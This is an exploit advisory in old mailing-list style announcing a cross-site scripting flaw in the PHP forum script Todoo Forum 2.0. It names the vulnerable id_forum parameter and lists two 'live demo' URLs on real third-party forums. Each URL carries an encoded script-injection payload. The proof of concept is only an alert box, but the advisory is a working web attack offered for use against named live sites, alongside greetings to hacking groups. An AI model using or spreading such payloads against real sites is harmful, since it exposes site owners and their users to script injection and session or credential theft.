============================================================================== _ _ _ _ _ _ / \ | | | | / \ | | | | / _ \ | | | | / _ \ | |_| | / ___ \ | |___ | |___ / ___ \ | _ | IN THE NAME OF /_/ \_\ |_____| |_____| /_/ \_\ |_| |_| ============================================================================== [»] ~ Note : [ Tribute to the martyrs of Gaza . ] ============================================================================== [»] Todoo Forum 2.0 [xss] Cross Site Scripting Vulnerability ============================================================================== [»] Script: [ Todoo Forum ] [»] Language: [ PHP ] [»] Site page: [ Todooforum est un forum entiérement personnalisable et intégrable ] [»] Download: [ http://www.todoomasters.com/scripts/todooforum.zip ] [»] Founder: [ ViRuSMaN ] [»] Greetz to: [ HackTeach Team , Egyptian Hackers , All My Friends & pentestlabs.com ] [»] My Home: [ HackTeach.Org , Islam-Attack.Com ] ########################################################################### ===[ Exploit ]=== [»] http://[target].com/[path]/todooforum.php?cat=post&id_forum=[Xss Vuln] ===[ Live Demo ]=== [»] http://membres.multimania.fr/ps2foreverall/forum/forum.php?cat=post&id_forum=%22%3E%3Cscript%3Ealert(1);%3C/script%3E [»] http://aslg.aslpaintball.fr/forum/forum.php?cat=post&id_forum=%22%3E%3Cscript%3Ealert(1);%3C/script%3E Author: ViRuSMaN <- ########################################################################### ________________________________ Windows Live: Keep your friends up to date with what you do online.